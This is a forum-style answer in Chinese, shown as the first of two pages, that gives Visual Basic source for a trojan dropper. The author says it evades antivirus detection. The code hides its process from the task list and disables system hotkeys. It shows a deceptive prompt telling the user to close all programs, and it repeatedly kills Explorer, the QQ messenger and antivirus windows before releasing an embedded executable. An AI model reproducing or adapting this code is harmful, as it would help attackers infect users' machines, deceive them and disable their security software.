这是很久以前回答人家一道关于使用 VB 捆绑木马的问题,有些 API 只可用于 Win9x,回复如下:
其实不需要记录文件的大小,我为了方便,直接用捆绑工具把我的程序与木马合并在一起,结果被杀毒软件给查出来了,后来我就想到把木马放到资源文件中,待程序运行时先把杀毒软件的进程给KILL掉,然后再把它释放出来,效果很好,并且杀毒软件也查不到,以下是我的程序源代码。里面还有很多与它不相关的代码,我是用来杀进程的,GetDesktopWindows 可以用 EnumWindows 完全代替,代码也可以减少很多。
Option Explicit
Dim wndNum As Long ''''保存所有窗体数量
Dim lpWnd(128) As String ''''存放所有窗体标题数组
''''设置进程优先级
Private Declare Function SetPriorityClass Lib _
"kernel32" ( _
ByVal hProcess As Long, _
ByVal dwPriorityClass As Long _
) As Long
''''获取当前进程
Private Declare Function GetCurrentProcess Lib _
"kernel32" () As Long
''''最低优先级,表明在计算机空闲时运行
Private Const IDLE_PRIORITY_CLASS = &H40
''''将进程注册为服务,Windows 2000 系统不可用
Private Declare Function RegisterServiceProcess Lib _
"kernel32" ( _
ByVal hProcess As Long, _
ByVal uFlags As Long _
) As Long
''''获取当前进程 ID
Private Declare Function GetCurrentProcessId Lib _
"kernel32" () As Long
''''在此程序中用来屏蔽热键
Private Declare Function SystemParametersInfo Lib _
"User32" Alias "SystemParametersInfoA" ( _
ByVal uAction As Long, _
ByVal uParam As Long, _
ByRef lpvParam As Any, _
ByVal fuWinIni As Long _
) As Long
''''屏蔽热键,对于 Windows 2000 系统无效
Private Const SPI_SCREENSAVERRUNNING = 97
''''将窗体设为顶层
Private Declare Function SetWindowPos Lib _
"User32" ( _
ByVal hwnd As Long, _
ByVal hWndInsertAfter As Long, _
ByVal x As Long, _
ByVal y As Long, _
ByVal cx As Long, _
ByVal cy As Long, _
ByVal wFlags As Long _
) As Long
''''将窗体设为最前
Private Const HWND_TOPMOST = -1
''''获取桌面句柄
Private Declare Function GetDesktopWindow Lib _
"User32" () As Long
''''获取窗体句柄
Private Declare Function GetWindow Lib _
"User32" ( _
ByVal hwnd As Long, _
ByVal wCmd As Long _
) As Long
''''获取子窗体句柄
Private Const GW_CHILD = 5
''''获取下一个窗体句柄
Private Const GW_HWNDNEXT = 2
''''获取窗体标题
Private Declare Function GetWindowText Lib _
"User32" Alias "GetWindowTextA" ( _
ByVal hwnd As Long, _
ByVal lpString As String, _
ByVal cch As Long _
) As Long
''''发送消息,用来关闭指定程序,比如杀毒,网管
Private Declare Function PostMessage Lib _
"User32" Alias "PostMessageA" ( _
ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
ByVal lParam As Long _
) As Long
''''关闭程序
Private Const WM_CLOSE = &H10
''''退出程序
Private Const WM_QUIT = &H12
''''查找窗体
Private Declare Function FindWindow Lib _
"User32" Alias "FindWindowA" ( _
ByVal lpClassName As String, _
ByVal lpWindowName As String _
) As Long
''''获取类名
Private Declare Function GetClassName Lib _
"User32" Alias "GetClassNameA" ( _
ByVal hwnd As Long, _
ByVal lpClassName As String, _
ByVal nMaxCount As Long _
) As Long
''''延时以确保程序已关闭
Private Declare Sub Sleep Lib _
"kernel32" ( _
ByVal dwMilliseconds As Long _
)
''''获得 Windows 系统目录
Private Declare Function GetSystemDirectory Lib _
"kernel32" Alias "GetSystemDirectoryA" ( _
ByVal lpBuffer As String, _
ByVal nSize As Long _
) As Long
''''销毁窗体,释放内存
Private Declare Function DestroyWindow Lib _
"User32" ( _
ByVal hwnd As Long _
) As Long
''''销毁句柄,释放内存
Private Declare Function CloseHandle Lib _
"kernel32" ( _
ByVal hObject As Long _
) As Long
''''枚举窗体
Private Declare Function EnumWindows Lib _
"User32" ( _
ByVal lpEnumFunc As Long, _
ByVal lParam As Long _
) As Long
Private Sub Form_Load()
''''只运行应用程序的一个实例
If App.PrevInstance = True Then End
''''将窗体设为顶层
SetWindowPos Me.hwnd, HWND_TOPMOST, 0, 0, 0, 0, 0
''''给使用者一个提示
MsgBox "该程序运行于全屏模式,请关闭所有程序以" & _
"获得最佳效果!", vbInformation Or vbSystemModal
''''取消热键
SystemParametersInfo SPI_SCREENSAVERRUNNING, _
True, 0, 0
''''将图片居中
img.Move (Screen.Width - img.Width) / 2, _
(Screen.Height - img.Height) / 2
fra(0).Move img.Left - fra(0).Width - 600
fra(1).Move img.Left + img.Width + 600
''''获取进程,并将它的优先级别设为空闲
SetPriorityClass GetCurrentProcess, _
IDLE_PRIORITY_CLASS
''''获取进程ID,并将它注册为服务类型,因此在按下 _
Ctrl+Alt+Del 后该进程将变为不可见,该方法 _
还可以直接用 app.TaskVisible=False 实现, _
但效果不佳,注意,该 API 不支持 Win2000 系统
RegisterServiceProcess GetCurrentProcessId, 1
''''刷新一下进程
RefreshProcess
''''杀掉浏览器
Do While KillProcess("Explorer") <> 0
Loop
''''杀掉文件夹或 Internet Explorer 浏览器
Do While KillProcess("WClass", True) <> 0
Loop
Do While KillProcess("SystemTr", True) <> 0
Loop
''''杀掉 Oicq
Do While KillProcess("icq") <> 0
Loop
''''杀掉毒霸之类的杀毒软件
Do While KillProcess("毒") <> 0
Loop
Do While KillProcess("霸") <> 0
Loop
''''释放资源文件中的可执行文件
WriteExe
End Sub
''''刷新所有进程
Private Sub RefreshProcess()
Dim retWnd As Long ''''窗体句柄
Dim dskWnd As Long ''''桌面句柄
Dim lpTitle As String * 128 ''''窗体标题
''''清除数组中保留的窗体名称
For wndNum = LBound(lpWnd) To UBound(lpWnd)
lpWnd(wndNum) = ""
Next wndNum
''''初始化窗体数目
wndNum = 0
''''获取桌面句柄
dskWnd = GetDesktopWindow()
''''获取桌面子窗体
retWnd = GetWindow(dskWnd, GW_CHILD)
''''列举所有窗体
Do While retWnd <> 0
''''获得窗体标题
GetWindowText retWnd, lpTitle, Len(lpTitle)
''''将标题保存到数组
If Left(lpTitle, 1) <> vbNullChar Then
lpWnd(wndNum) = Left(lpTitle, InStr(1, _
lpTitle, vbNullChar) - 1)
wndNum = wndNum + 1
End If
''''获取下一个窗体
retWnd = GetWindow(retWnd, GW_HWNDNEXT)
Loop
End Sub
[1] [2] 下一页 |
